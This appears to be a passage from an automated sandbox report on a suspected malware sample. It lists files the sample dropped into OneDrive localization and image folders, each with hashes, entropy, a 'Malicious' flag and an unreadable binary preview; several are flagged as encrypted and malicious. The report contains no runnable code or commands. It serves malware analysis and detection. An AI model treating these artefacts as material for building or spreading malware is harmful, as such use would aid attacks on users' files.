Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	237190
Entropy (8bit):	7.2579539446843935
Encrypted:	false
SSDEEP:	6144:7Oi1xSUlYLTlgUFwX5ZyzJtaSLt4ciJJw:KulABk5k3t4cAJw
MD5:	A527F6E9B29F034A4CEB7442105D5833
SHA1:	FEA59AF9351A8A06EE70CEA5FAA787AA61575FD8
SHA-256:	4D327D915894BAE69B6B2B7162FDE7881F2F9166722953711BB8B920153FE8B6
SHA-512:	AE053F5CFE05BD2F36FD043977208DDD1045331B2C1DC5F35DCA26BAC007B78907E9CCA9DB9555B869419BC111272A11499FBF1B80F2E9795C3690AE96F3F4B4
Malicious:	false
Reputation:	unknown
Preview:	MZ....p^....rc..&8T.L.t..i<09.].5.7.&.Q7.u....V...(0./\u..b..G..(.....%J.;&Wd.A......D...N.U..k...#........4D....JGZ:.#..v.%...4.X..QP...IQB).)..".h.QVjU....n..y.....%Z...<^.d..:.WHGj...3g......$.,T.M~4X..G......V....>e.L=t...uL.ZR......."...5.9{....~.....+....tu.63..A..X....DB.........Xw...\$...#...9.. >7.W<-h,~q.S..V3hox?:.8...+..P.kC.....RB.3;%....m.:.`..S.8.8u...o..+..\|}.5......rK.N{.@$...#?.E..k.!.\...<..P.^.ot....2/..i......~+...KO...htc..X. ...... p....Z.g... '..'.O..3.....YE..jc..I....[....I....>...o.&....6...&.....l'Q2.rAp.1.k.<%.[(..@U.S..H....&w,.H.e.y.x.H....s#..].....U/....[.~gM....r..........`....O..Y=.2Lt....,V.V.6....G.^...:.68R.H.N=E.W...Ff..HJ.....)....e.v:..RP....k....;.mtvf+.-mM...Z..d!..O3.$~..8.V!.o..F...SDN5.Y,ei..o...HG....0. .Li...... ...zv6..U.5Y.9);Q}..,.-.8G.N.6.=.....P.V..~.'y.....(..."...%.K.O..iz:^w.)p.G....ss.....8....w.........p....2p.n-9..Z-....)..*I!..Z!8..( .p.9...0...Gn...1`W0.6.....#..O.wH.M

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gl\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	209030
Entropy (8bit):	7.581813635330285
Encrypted:	false
SSDEEP:	3072:q5ebgPa8C4pdXFkpS+5x8SV7t1hZh2yqWymq0PHT93Pwqy0:q5eEPRBeIa1hZhCWyiPz6C
MD5:	9090E747DCA27CFA2DDB6A3C25DB7429
SHA1:	A283E7ECF1195B9709F6D1A69BBEA3B26D0FBB61
SHA-256:	C08FB3A15D94E59E4DA19E18184CE0B1778B74F128F1DFE345CBBE6A2021B803
SHA-512:	B6D9FCEAB1330E5D5DF092F398316AD25FE59D315E35990FE7051CE989640C72516BEE739CE1D4659C4BE7BF6C731B21E5A4E9F48D6F7DCEC74895EAA118471C
Malicious:	false
Reputation:	unknown
Preview:	MZ...fZ.....G.1qG.~'.B.......@.^.A...Zc(....j\0.`q7...;\|..{.......P.C..L`.'.v....AgO.y.;..J{.]$.S.....u.o:&......%I.,.`E.>t6_tw......'3Y...@..r..'.".>meQG.t.8,.]...Bf.....N.G.]...y....v...g..1.....H.r..J.-7..Ng..U.v...D .g=.t.&.Gq:<..$...Q........:....+.d<...VH}..e...l........%..u=.w.[s0.>...`..M."Y..u....5....k.d.\|..$.p..W..(.F.i..A.cY[...}\|B.7.7...g.......N..8...V......X^K=G..=/:..;.Z.%.}..0..T....*....6~_{.Q...._..0...M..... .f.fd..3.....Y+S..#8..E..q.iw...=.%.I.....d.......]..8J.z....syC.%..U;.^..B.d.4...y..O...UT.....ZU....I..........aw(.....N.~...O.h.k3.^...a".Y..u..ce.k..A....{.W..b.....A.<r.T.v.D...%.P.(.&h3.....f..#.K.[nl....^..T........Z..N"....@.5.aX4@.....!O&.:.0.q.....&v..fy.!.e.n2q........3<...]Iu..b.{1\|..U@.......T.....#f.2.......'7M....S...:.....`..C......a...&.NHt..A.Fb.....@.}nCK`.K.x..F...n&....8....._\|.X.J..g&]$.[..y2.......`Y.>(.)...i.......kB)w0.;Q..y..#...&.h~1.J....v........6..uG.[.&..........f~d..0... ..B.m.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gu\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	199814
Entropy (8bit):	7.768823827192568
Encrypted:	false
SSDEEP:	3072:1S3UtYifDThRhj93RRkZhiCJvgyqfMmn9T4OIm+NtDJEssxl8srTAjdpjyGO:1LtY6ZjVD2cCJLmnbYx5srTAj/A
MD5:	EB01CD5E11AC4E387F854D255EF17F50
SHA1:	A9EC6E5DC69888879B7ABAA0BDE7CD19275C776D
SHA-256:	D66662F06750EB1798BEABB0D6956B683627E272B01ED7EF862E2E1DEACCB049
SHA-512:	65845190D13753B6601006E7ACE69B766093A19A193CBFA529E94B1867A05A14135A02D92CB4591558A5262A5683A4934FF9CB16355688C725B315753BB5A6F5
Malicious:	false
Reputation:	unknown
Preview:	MZ.....%....6B...Y..=.D.....y\|.[ K.....yDG.......B.....'..UHY.....EF3.$..=:Vs&:......7.......]..............mn9q=E..qz...........fs..=..V....[.s.dL_.D.H....v..T.e.= m...U....K.g.....H...%...)[......B..HZ>...\|D...rQ.F.~m.YD..6Z..o}....?.@.........i...sn(Dx.....0.u2.........b.....34L{..Ts..0...f.W.s/G...OU.x..T-......v....I........R.\|q.3....K.'I.g...%.-w..u..R.[....e.-z..[.~...=..h...}z'.N.X.....:.#.O.Z.4.U.\..F]..}(4...;gkJn.+s....'g62E.....}:4. .I.........r....u^..{:R..wo.m....[%...@m?C..R...Y.(4.....+W..G^z1i_........C?~..../g..H....[...?.....2...th.F.tZ...F.ly.@{zq...0..=..+...e..P.......,+Z)Od.....H....0{..I{~. Q.RF.8[.s....:.T.....&T...Sp..,..`.......H...3........%.(.`.}..`..ZD.."....q....4.N......B../.k:.PG.k..........}<.......5.....Lns...D.....1.J..[3L,[#.t...^..f~.....d9g......U.A...G...........Qr...3..D.>...2HO.ea~?q....(.`......y.-..}...J{...!h.....T~..y...f....+.....O..Z.....;....j2p.-..f.#.\....Q.p79......v...`~].N.V.;....=..`>/.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ha-Latn-NG\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	199302
Entropy (8bit):	7.698925752305602
Encrypted:	false
SSDEEP:	3072:SEAhLIpkzs9b/LpztZs3DHEg2j/kBfwvUPcT8m3GyWFdHh08EJ0Y:SEqLIpkg9/BtCzHujEw+E8m356fY
MD5:	33F92FC12FCA0F33100DB39548EC3DE0
SHA1:	DF15C183D7AECBC825398466E8AFCB02875F52EB
SHA-256:	653E7AF72C0C908AD39A9B390DE8C3907CA963424191747A5CED94A684576A19
SHA-512:	DC7428692A3DA2E74398E03FD62A81D7144E58F4B68E52848B5847AF1159E596ECDE8CE545A3435FEFFDA103107260E716E2F74265869C45B7850596F82A549A
Malicious:	false
Reputation:	unknown
Preview:	MZ.......Yo,.....6.z..5;Q...q39?..rO.v.;n.sY}...x.N7..........Kq./1yC.b.w%.)X..]X...`SQ\|.D.h7Yy.....[+... .w...;..39A..G%b..M?.iT...N.#....Ld...V..y.?...A....u....y\|.......g..b.KM..B...?...w..l.....>o..........C...."%.a......0..cx\|...}..e.."....\K..@.N.g.......p&.....8...&8..}.....r.W.(b+.rs.RF=I..Zw..Nn.>.9zn...T.....z.[........k.I.t,..f.N.-J..<.7..S.z.......1.C;...b.c"..\|.gs..g......mq"&[..Aq......Zxc....FPhy......'.#0.Q..>..h.<.....=.ze.#..Cs...>;.}........A.!..[.T5{..'N]...J..9.2..8..~@.<...y....@..Y...cP8.3...._.j.2i...\....I$..I.A.......R.C...1.4........k.W.r.....>Z..y......?....&.1!...........[...@..b...b.v..6x....... R.G......2W....ky.........6.lM....5...l!.d..n6,.I..R....t..M>...."..On.._.y^>r...Q%D.m..S.Q\7..a....Xu.Jh....r5@....N..x.......Ii..v..v.R.G..../....=../I.-......!+..1xb......'....@.#6Za.`.\|.\..a.....zz..(..O......{....Eh..v.J.i..,....:.4*.x....^Z..\......>fD..'..r...6[.'.?/B`'...,v.....o....'..+...t..8.~.[`X.FNV

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\he\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	161710
Entropy (8bit):	7.996498816279495
Encrypted:	true
SSDEEP:	3072:IrWFkHQHytT0BWVD+05ZOw+kARDfJh4zzIV1614byP2W7A1uzq:IrWFkHbT0ED+0LOw+xTJmuq4ErmH
MD5:	3A593DC80DB1BAB7C6093D878A844DCE
SHA1:	87E5D7C3D826ABCB146EEA4A294680849ABE0700
SHA-256:	CD6821A2EA218254F776B4E38492F1BF486C52348E2EA03A5D021D97444373E0
SHA-512:	6D8D2353D43F15C7FD19B57BE6302F98C481884C42FE179BDE3BC2DEBE6D8939206817D773DBCA70BF51EF731F6BE6CCABC3DE982C45D6050CAB7E023E3CE9E1
Malicious:	true
Reputation:	unknown
Preview:	MZ.....X.4..?..=..I.p.#.....`..5..^{..m.g..k.......}........}rK.nW..<C..N.z...p..rY.hc.;...;.9.Fk..vy.1]7......S..ov..I.......>)..!.....5....5.E..y....x.....Jh.K.G.H].xx.....0.)..R..5...?.....1..\{..a..H.... %M..=30..,.&.d.....=)..i6..'.O.~.Jb.&.4P..e=.c.<.1..].zovF!h.....i.....n.id.R.V.X...........}}..W.;..OK.<..X..X'.=".w./.[K...XZ.{...,.X...%J.E.~%@..Y.tN..q.v..~...h.A.....>\.@.4..Ek>.fU.d.8Y.+...f.jp....v[..yHH1j.....30..z.@.o.}W\....9.L..@GF...N...B;....;GG.h>.....d_..].z.M..&<..\.".n r. ..8tC.[.U.....Je(....lJ....GD...}.hs..ENn.k......o....j.j@.;...d\|.yy....&.....b.b..B...)AUr._....3..^.9^:jiZz.. #m.r...O....b.q:2..~.?...L..)."....3@b..t4b.<..u4`.W.K>......Y.J.f0.T{o.........W......).Tu.:..<.A/bsZ.Q......_...^Z<1....J....I..V.s.q2[.y..#..2.D..N..[....ua.%uu\|.eMq..H..5G_\....g.!.:.g...f{ ,.O.Y.h.-5.9.J.ss......#.I-(M...g..3)=@.....f....@.U..Z.Y8...p..+.... .AW5.^E...:..0]R.........."...........+...,...b5qw..Fe.8.a.......n.E...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hi\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	202398
Entropy (8bit):	7.735291054812575
Encrypted:	false
SSDEEP:	3072:hqKARlXulkJM8PJ+r90jDRJZOL3idIwlea229rNqBbX4JsjW9NktR812KQSPNq3:gn/xB9JZI+eR7boqoa9b
MD5:	6218987DEF154A9802A4B4BE40F159C7
SHA1:	C738CF914E0FD976713738CE1B157B05DEAA258D
SHA-256:	80F8B69B1660EC6184B5BD65A0FD4253069680DAE105F32C1B6414BA59FF0835
SHA-512:	A5FBD81B629A6344719826ABA0B6C743BE34E61CDE9D5735ED87B71B1B3FC36AEDB01411422BA8F01D38574ED4E54E1100E531F99ED55DF9D489AB8DE0EC86E7
Malicious:	false
Reputation:	unknown
Preview:	MZ...N[.....Q=P#Nya....".R..Z.Z0_4...e_s-.H.=I.c..e.....z...a..=.l...}z..~p.X.!Q.D....W.Z...`..o..uTD...G.g....-A.. +[..xQ..'}..vR.....;.#.9P...+...@....N.N.......:.N.cN......r.........~....vDEC.,.A.eqO}mD\..?m.....6r..y>YA...wY.I....W...(....s5.e. .L......!._.>..$..NA8.i...L...mU4B.YJk..^n.p..>1W!c^B..w.# P.~.\..... ...n}v4S....E...P.......A.o [-C..p.e.W>...\|...._!.....^.AS,D.[..T5..X.M..3...K..'s.9[.YN.`.4...O..j#b...Qz.F...... qG....1x0R...A.S.+{....o..0G.xH{I.9.....m.....Cr.#y.E.Y..8..D.............#%..v.O...Q.J...{....l..m2"...a.oB...T'3k+v.r...A...k..3NWm.....F.!8..j....r.~..v;.B...uh;..:..O.......@..Y.D.'b.f.U.A.s...\|0T..>M. ..7.........Xm.BT...[..z0.K....%...O.4...q.X2...AB1.....t..o~.....W.W... ._v.HZb8h=.c.^.t..,_.j.X.WP...m...3.......^.....}.W(.j.M....S..AB..M.ImW.)..{O.mg.........'(j......?..;...j.....w...u.>.....(.yU..yc..+BZ*..3...bUS.3.U.m.j...F.a^.".<...m..t..G..2R..?...\........hgvU~..;bw...C...m9....G..G`...a...2`.8.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hr\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	204934
Entropy (8bit):	7.640868808965765
Encrypted:	false
SSDEEP:	3072:6qzns+tlgqgD8HCrWnxuQY69tLUnA6X5hLT8Ndg99spr2ZQ1Dld0LyLelnoc/:6qT1wqgg0quVq8A25hUrg96pywDldgZ
MD5:	7C8CA78FB6F9F2F2AA464BD7CBA25009
SHA1:	2120AA9EFCBDE31A691E9851AC6963CCB37C07C9
SHA-256:	C90CEF2CBE4635E6C0BD56F442F2949C928F3B5EB9793F9A8BC14EBB621B06B6
SHA-512:	647C0D4EB75CE66E6E4F1ACD10B7F617540990E5956DB1B45EAAA98414B6872D2EB445B4CF4CAFFA353D8A8C5D6E5339329BBF98DFD6D4B3CE73D31D332A9D37
Malicious:	false
Reputation:	unknown
Preview:	MZ....A.C..=mh..\....gHX.b.j....Wb.,.....B./..@..b.....=U)++qLhW.?.uvYt.x..1cs}...B.}...cQ..wIS....._ CG.ji.-.AX3t..di.\~.+w.}."....b'J_..J..r*....Yj..=.{L.@!..M..m.F.....;=.w.[."..Sz>.}^S.p.53.I.....A......TR...."R...0.....l...F?Fw.4...j..V%[E9;t.p..]y............EE%.g.=.....^[o].H...^.r?.pS..B"O~..rFu.].v.E.xC].....c.t..R....-2hL.e.....SG..Y.^y.V.!.:...}....OD.oJ.m..tj."..J..[.....4.n...J/.."xk!Pc9.8.(..z....%.c.?.......8f..u/_.f...q:..>^e....>t....>v$....?.E....{Z^.......AWB...^m.b>....=..=.p...;.L;..1....`..,.^..&.(..y&..k......g.\.g....._.1.[._._..R...u..Q..?t^@."6..z.D...w...)....u...l......l.#.f...Oe..B$.0.} ...W...`.;...V......X....%..o/.(.............oSY..c.y`K...;:Z.9...~...[.A.F....p.G;.wHp...C.....=9\|.~.p..A.2.I..S.V.z...+.L.O.h..N.~.#E6...J...%..!...4u..[.>pB.^.j..Q..1......Q..0...;..G......+.....{. 3.N.M7..H..".q.).....,.@5....F..1..U...t$%d.l.L......EM.....G.n...}...H....g./.L.......W...L....%..M..w1......_.....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hu\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	212606
Entropy (8bit):	7.561632879334268
Encrypted:	false
SSDEEP:	3072:UOvqPdmWgon9PI46RlHlG826nLPwVumUN2K/YHVCTdplH2hS8Uww1UcpalnR9YzK:4mboFIVXnI5UN23Ur8jwKkh4
MD5:	B58337BCCF030A33834800B8307E1913
SHA1:	5196DF54FB65213885FF56EB3C81D1BAE8970F18
SHA-256:	3E55E39295AE6A512F5A0FA1A7073D3A484ADB677AFB7CAF443F12B772C6C628
SHA-512:	878BB3E65F2B4CCF4193848558674BA802FF742C5E1C3B97BEFB00B690ADA34BCF58ECD0B858D55E799AB76A75F1BD7AC5CEE7E29E871A782857A090405BC6EC
Malicious:	false
Reputation:	unknown
Preview:	MZ....Yc.ny.d......y.....ik.a.z.GAY.Z..''l.*.n-.xy.(s6.W....m.F.......... .Y..Z.B......>...K..a..p.B.<.42.p....L..yg.%.oP~.1...{4.<.....Z$-(..f.....n.......h..5Hm2.U%..... I..l8W.....bSW4....?....'.h.[.o.....Y..s.&..V..S<..0...=.....f.A%w.i......4RGbDY&.]..........1.....?.]].f..X...X.;.n_.{...f.....h.....<....n.rM~...._._..>....!.'.2....y...fI...s.C>......BW...e(..............q_d..J){.l...>H. b.......X..3.tA..7i5!..."~ .y..p........'!..Y..A.ZC#:.b....-F.....`..Bo...2Z.....=...b.....0.r..m.1.....q\|=sO9...7(q..b....6.........X.[..#......o.....]..K`..ul....U..-..\....L^.al..v..c...j0..2.A.._2..+..O.....a..u=yW~.h\|&.)%..k..mg....{.3..a.u...\,.....#....0..... ..'..r.......-.:.'.P..A.G.;?...../.P......).n..h.._A.F....x.a...I..+x..FgH.....M......+_X0IN.>.N.)......x..t..W.D...>.="....vc..U.i.)U.Vo..FC...1.....LNR...O.yA..@.9l...Q...o3..[..W...'i.....d.8gP..:.;.........b...h.^]9W[....w.V...X;.5PM...y..=$.N!..5U.A..$!..Iy.)=.D.......5B.H..D.v.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hy\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	197766
Entropy (8bit):	7.776512797483696
Encrypted:	false
SSDEEP:	6144:o3nZW1wumTfaqE8JLps502W60Tdf+eaMe:8E1ECqEn50ZlTdo
MD5:	4B5A94601E4BE7821BAA0A5D040DB4FB
SHA1:	3C11ECCCE5C400D3C5EB79C62273ACDC7804DE89
SHA-256:	E54ABC7A7C59FD26A064D5FF972E086C06E8709267AB36D73078521B726A68D0
SHA-512:	C3EA28981E83E0978250140C8C7C9A1F0130D5A8283B9D0F47D4453ED526484C11F0CD21D6C1A1F6CB791E1721A02E1CF5FDEF1F6DE98F1CB72FCBEEC10ECF74
Malicious:	false
Reputation:	unknown
Preview:	MZ....{.b......4f_.hM..<..m.....a.K.y.H....bf...d.....V.s.....`.H.h=T.6g...6x.....?.2<V...G.A%.Y+...<.X.H+..l......G)...K3..v.6.z...#..b3gA.....$De..]1.sx.u........A..s[}..d....]...S!.1.@q.\.SG.....y....4..5...../.-......b..u.6.fq..zs...3.`....9(7...&.....{.'f..DS...d.G2.s8........b..{...D..R...!.^n..q.)z\..,d..4.X..<..O\. VL8.,ba~..(4.Q..a4....[e_.J..U..4...k.b...wtA.U.T...}v..uJ..]YJjO..]...t.e.e`..I......MBM..~.tm\|...<5..l.1.7.g#.H.....r...S).0\|\|cT.pb.\...T.:R.t..g.$J...9.zK..}..\.......<.(E.o.'u..U2u....t..?.E.M:..[........T.4...V~.K......EL.aL...Aj..2...d...~.+@.......?Z...m.}....d.x 94...d...D.g..8...f+d.x{S&.O...+......xE.)le58.bOj..}D..X...f..Uo.oo..FS.@z.G.<`hS.P..j..f.y..jS...1.Bx.u......n.S........{..a..=.7.;..9g...^.`;i...pS.......o.C.5.$..>.P..Z....A\|....gj.xv.A5n.D..H......H.v.i....O....jK."W:bE.O. m.Y..S.<...O.o.......`8O..u1......&..xL.B..Z.gM. 5LY..q=...E.NJ.8........8.M....Z...`fd.<.tm...BA..(pE.F"

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\id\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	197254
Entropy (8bit):	7.719819751865634
Encrypted:	false
SSDEEP:	3072:ktA8tvAoTd9uDJEG+rTILM34xymKCX2yAlZBgIN56k7CvMVHL1HoEpKf:kAdoJ8hLa4QmkluE1M
MD5:	8E6FC2DDDECDDD3FDF329D7D7389952C
SHA1:	D5BF31C9A5427022AD46EFE3C92A7E6ECB21F117
SHA-256:	91448D7AB91BC7AF900F9847B57E29DBEAF6CFD03AAA9720B8F6C440D30C9544
SHA-512:	CFAB4D3364516C9B6FC7C3F8CA8CD2EB56B79F2F96C34B928C9DFCE31074B8E4DAF6EF98BCD5BA2D926B2C347FDEA2EF59D88F5DD405286682E4C4F537B4AC43
Malicious:	false
Reputation:	unknown
Preview:	MZ...[..929..6U)..x.2.-.S....&.L....B"............=:W....[.cBXYF.2..J.V4...(.0..o..e...o...M.P.Q......W5.E.{T.3.aMy...eZ...G...c7..a&.00jf.:uO....M...&.S.n..g.hW..2.Q.tXF..`Ktv.Z3....I........r...-..rh..$..KW....@..]..Z..s.....o.NkF.b.vF.......\.oo...../<..[...>1.....;...)%.(c.2.:....CI..x.mo\|(.2..#_^.r...3KA`0.l..]#.. BR.cU5.Ic#\|(+\|9k.]z..X!....>t\|x.....v.tU.t...l.x.O.....,...l.&...;..xU..#.n.F:(~.$HO>Z....K..\|..r...........~....#.I/N.....-.q...ff..;..Q..f.C.._.>.;.H.F......Hjs.}..@Z&..U.w.K.'%....k.....)A@$\|.a].......b....s_W]:...T....X..f.w.[.,..7.Z.$[.\|.#R.g.F@..n.....T..c.}...i..K(...i..p'..iKO.M:..g..ffa....C..a. ..(..:.w.yJ:.D.a....g....8.1Hr..\|.&..;...D..^I..E..t<...H'..K.......i..c. j......xVt.+.\|.=.....CI.u,../oB.'.......Z.#.W5.....,,....z..[.5.%..c...J2\.t/sDg.A...NX32.).\.w..~..5.n..j...@....g.../.&Q7.O4.n...h.....ZY...m.Z..4.[7....0g..b..W..4oef7..A.x....e.......O..j...Q....oh..l..o..b.i.>..."..#W=F.n..M*.e,)\W,.{.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ig-NG\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	144006
Entropy (8bit):	7.998567750730326
Encrypted:	true
SSDEEP:	3072:rWZCSPBnO6U5PnFoJkWgVg/jiHmgtxR239EQVy:xSPBXU5PnFoJkpV+3uqVy
MD5:	22DBDE0E9A61D257CF0537F363C82063
SHA1:	008C4DAF09BB87D575A50604F785D6E1D89B4D7B
SHA-256:	5955AD11FF9D4A90B52D34FE7CBAA50A7E2D2FCC91787CF699B9EB3BB2EBA3A1
SHA-512:	73A12D5D35BFAD665A977E75FEE7F64165016F175AD573CC1B6A3C272740D9C1315F5C215F408CE20A36C56F4162901A1AA13DDFC63B79D3B5E850576D8761AB
Malicious:	true
Reputation:	unknown
Preview:	MZ...k..Fm..P..Ah.,.<Qqu).b........Lds....G.@.L Zcp.$7..yK.7#.5h!..hs,..?..".f.h.#a..n^...._..`n\..Q4....>d>..n..&.L.[r.N~..8....:p.B:...aJi.q.::. .."....f.....&#7.on.z........y...j{^....=.b....."L.6^...c.W..(W..].&8.'.A..w.6o...>.t....D..L.Q.(C..t.Z^.1z.}.\...#3U.BM....L.1.o..@.W2Bp.'Z...6.w....T.7Z...#.c....p.....%)\|k.q.0.9..........\|...7.j..a4.t....~@..?...gV=`.#.j......&...!...i...T.3....h9E.0...iB../..y4....T.B.[..-....vJ..84G...o\|...../.=eX..:..o..f.f&.iB.#^.5.aq.Q...;..F.j./.`...........+.4N..l.V.n/BE.Z.IM......sv?o..O....).-<..O./.l..i..u`.K.C2.k..%{_4U......X....r.....w..mo7.....=m.............u....U..l..Pf!Z".$;.....ZSXW.B..+.....z.YWE?.&$.9..q#...s...B....../ajM#v.;U>...v.5.dI. .~....K.Mm....*2......"....0...U.~i...{...p.,.u.R.Dd........~..^.G&....w....s...].AC....=<O....4..=.3....Md#....z.@....}8........,..C..d.O..r.ZY3.....e(rx....m..~..d..e.!&.w..fH..Q.h7Y..........,[O..`...x..e..@.y...:...+.y..F4:'...h.p...g..i.9.,...H

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\acmDismissIcon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2623
Entropy (8bit):	7.932183384707382
Encrypted:	false
SSDEEP:	48:xSQDhNqvwluzp/xyf7Y5zrNs4D8q7Lmlo8xKRPxKsaVpi5/u/sWvicjD:r9Nq7txt64D8qfmqRrAihQspY
MD5:	7FEDC1036C0027E750D660A8F0EC5EE3
SHA1:	F287B29F973AF03BC82AEEAEB74631722FF84B8E
SHA-256:	12F270D2982F2A006188E1A5CD789D5AC3D7681C3D415A759A50735B2E7EB309
SHA-512:	A05F24109BA6675CA5536EAA9390AB692FD82859ED8E5D114E363AE4DDC08EF91DDDE12C87B5105465942AB93FB966538CC527ED38D2335A9B15D3C882982FC0
Malicious:	false
Reputation:	unknown
Preview:	<?xml.gt..ocr[.l-.,...&..L..UeF..x.....}....5~...aC..~.C...hY.A........8j[....T^.,..0..:.x.K.E./(..i,..d....)..B{....y...Z.Ri...,..ER.Oc.....n.8.MJ....z?u...,.~..j...^HR...-.O..oH.`I ..`......}./.q\...u..6h...D4.4..;G........&.B).......N}}a.4}m.z,...Q.s~..D.7.....H..k.=..c... ...b6l..-o.#<y.Q.{.$.Bky9} TkrM.z.S.4..(.vx.7H....B.'......p.......E.j..P.....<JI....9#.8....cw.U.-.%.4..a\|...3.`._..&].-..B.&nt.....4.....O02.@.....jwH.....v..dR..r...x.7.?.f..T3vm>1..%....... ...R.{k_/..7v3..(..yYXc....Kd.T.......+.[BB......a.(p.7B..M..VeM..C2...!.[...Y....^Vc..Tg.....u..v.......\|.....'..q.\n..aMF...-n'=.....IS.%.z..D..v1.D...K.i...<....C....?.#l......./\|j$.\|/%..x.lF35.....lo(cM.&..E.'.9.h....4&<..j..L...........AT2@......+.....v.-.GD/..n(..........!.i..u+Y9S. ..a.l....~.!..h._.ko.Qi..w..."._h`..sN.@.O.KU..W:z. "......!.a{\.....wX\.R.u...6"`"B..d...@...+..]...A.~...K.na...>........F.6N.VF./.oaj9G......e1imp..\.%p....U`...$G.u.".3a.$.l<.~.........&

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\acm_low_disk_space_online_only.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	45627
Entropy (8bit):	7.996303908850621
Encrypted:	true
SSDEEP:	768:0Lxcm3fIhBEX4xeV48thD4JcnrC0K/KLdkHyYwU49OIBrhNz9pEcsv3WGei:8nfIhSX9dtiJp/KLdkHyDBVNvEVhei
MD5:	81F55CD60B7EC58EB4AE9D034DC2921E
SHA1:	5C316B13DB51F3051EAE05ED855A03CEB4C365B2
SHA-256:	F98D9FB1FA1FE7009CC5A55324AD3BA260A81BFA1362449D25320FD1B0205326
SHA-512:	6A2D7AC1454EED80697AA93316C4B531B0BF97E041693777254E9F7AE07E63714347D4E91091965E3CBD5021FF7B0E72F7F60A5BE7A3A538461E0D6DFD00BC74
Malicious:	true
Reputation:	unknown
Preview:	<svg OX..Jy...1OmpR....8...1.._..{..C...b..Q.....Of.....c.).....n;....Ac..s...jh2..7.-.Y.8.H&....Qu......+wj..3Z..NBW......1..h..S....i1...`]..u.z.j.3....Pt. ..J....Wa\|.UB.....T.~.S...j..U.7.c........N.'.R....Hf.$..`....m....K..?..rIM..he.~u.......7....,..i.Ku..._...Ri.Yp2U........8...v..U....l...>..t.>O". .3.%.....SKR...1_.l...D........a../9......8..".[.]....a.....$i..Ny.LK.uR.o.6...y....r:.I...3Q.%'..3`...F.5B.\.W.0...5..k.........c...6.G./..T(.p-.1.....[.._...G6...#Q..k.......y.g:..jS.`.~.d.g/.k....^*R[.-M...utCU..=......V+5r.t<...)F!.i.?..c.v`...>....)........@......[q..<./....$}....=X9....-..3.B.E..J..5.=5.=.i._:<.90z1.....3..1.;IA..a)U...{..2...(.E.JPa@.P.........w..1.3M.Zt@...n...=2.....8H.1.....%..a..o..j....?}E8j'....&6.-(..qL..6....~$.i"u.`...c.I.v.H..;.hID.6 .....s.U.>.....`+V ...J..>........E"...;:.......U.u....e...]w..yZLK..M..]....~^.uk...G.}..}A..}.R......-.x..k72.`...._VR.....W.Qu.h..B...Y%?.9.@\....>...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\backArrow.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	564
Entropy (8bit):	7.556598490523277
Encrypted:	false
SSDEEP:	12:tMlOpuj3Tc2WfFTXKccFU6oVp3bjRhQckjBI2al2pPJI5Adtcii9a:tpSTWRP7lbNhjyliq/bD
MD5:	971EEE092494891767972E217522719A
SHA1:	028B107D259C6835C5E794CF0032DA123D2A7E03
SHA-256:	B143452B28A4DF3EAC00EEC67CED838461C9854EA180AD676ED2A635F12C2525
SHA-512:	62B2BD2350928C0C60680C3BCB3BFBC002377C1BB7C071895D791C5C1615757486D0BBFE75FA87E5A06EA1E08D9BB7EC905B0E95C8BB9684E9ED9B507D200103
Malicious:	false
Reputation:	unknown
